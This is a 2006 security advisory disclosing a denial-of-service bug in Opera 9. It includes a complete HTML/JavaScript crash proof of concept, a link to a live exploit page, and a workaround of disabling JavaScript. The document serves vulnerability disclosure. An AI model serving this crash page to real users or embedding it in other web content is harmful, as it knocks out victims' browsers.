OPERA Web Browser 9 Denial OF Service

ECHO_ADV_35$2006

------------------------------------------------------------------------
------------

[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service

------------------------------------------------------------------------
------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips

Date Found	: July, 1th 2006

Location	: Indonesia, Jakarta

web		: http://echo.or.id/adv/adv35-y3dips-2006.txt

Critical Lvl	: Moderated

Impact		: Browser will automatically shutdown

Where		: From Remote

------------------------------------------------------------------------
------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Opera Web Browser

Application	: Opera Web Browser

version		: Opera/9.00 (X11; Linux i686; U; en)

Opera/9.00 (Windows NT 5:1;U;en)

Some Other version are bot vulnerable and others are not tested,

URL		: http://opera.com

Description 	:

Vulnerability can be exploited by using <iframe> combining with javascript

(documents stylesheet) to create an out-of-bounds memory access.

------------------------------------------------------------------------
------------

Exploit Code:

~~~~~~~~~~~~~~~~

-----------------------opera9xploit.html----------------------

<!-- Opera 9 DOS exploit, discovered by

Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)

http://y3d1ps.blogspot.com

//-->

<html>

<iframe src="palsu.php" name="fake"  ></iframe>

<script type="text/javascript">

function mystyle() {

if (fake.document.styleSheets.length == 1 )

{

f = document.forms["basicstyle"].elements;

for (j = 0; j < f.length; j++)

{

if (f[j].name == 'fsmain');

}

}

}

mystyle();

</script>

</html>

live exploit :

http://y3dips.echo.or.id/opera9-dos/

------------------------------------------------------------------------
------------

Solution:

~~~~~~~~

Disable Java Scipt execution from Opera Web browser

------------------------------------------------------------------------
------------

Shoutz:

~~~~~~~

~ my beloved ana

~ the_day, K-159 (keep researching), also all echo staff

~ negative , naisenodni crew

~ janex vind "waraxe" @ waraxe.us

~ newbie_hacker[at]yahoogroups.com

~ #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
------------

Contact:

~~~~~~~~

y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id

Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] -------------------------------------------